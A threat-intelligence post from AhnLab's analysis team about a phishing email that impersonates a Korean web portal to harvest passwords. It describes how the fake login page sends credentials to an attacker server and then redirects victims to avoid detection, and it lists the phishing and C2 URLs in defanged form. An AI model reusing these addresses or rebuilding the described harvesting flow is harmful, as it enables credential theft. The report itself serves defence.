The ASEC analysis team has recently discovered a phishing email that impersonates a well-known Korean web portal to collect user credentials. The phishing email demands the users to upgrade the mailbox storage, prompting them to click the link. Upon clicking the link, the user is redirected to the phishing page that prompts the users to enter their password.
The figure below shows the subject and the details of the email, and the link redirects the user to the phishing page.
Upon clicking the link in the email, the user is redirected to the phishing page disguised as a well-known Korean web portal (see figure below).
- Phishing website URL: hxxp://www.eylulrentacar[.]com/indexh.html
Unlike normal web portal login pages, the phishing page does not provide features such as one-time-use number, QR code, find ID, reset password, and sign-up.
The checkInput function is then enabled via the login button on the phishing page. The checkInput function checks whether the password is entered, then sends the collected information to the attacker’s server via the send function.
- C2 server: hxxps://v2.faj[.]ma/wordpress/wp-includes/js/tinymce/plugins/wordpress/plugins.php
Not only does the send function send account credentials to the attacker’s server, but it also checks the frequency of the process with the count variable to redirect the user to a normal web portal login page when a phishing website has already attempted sending to avoid detection.
In order to prevent damage from such phishing emails, users must be vigilant when clicking a link in unknown emails and should check the URL of the link to see whether the features of the page operate normally.
AhnLab currently blocks the domain of this phishing page.
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.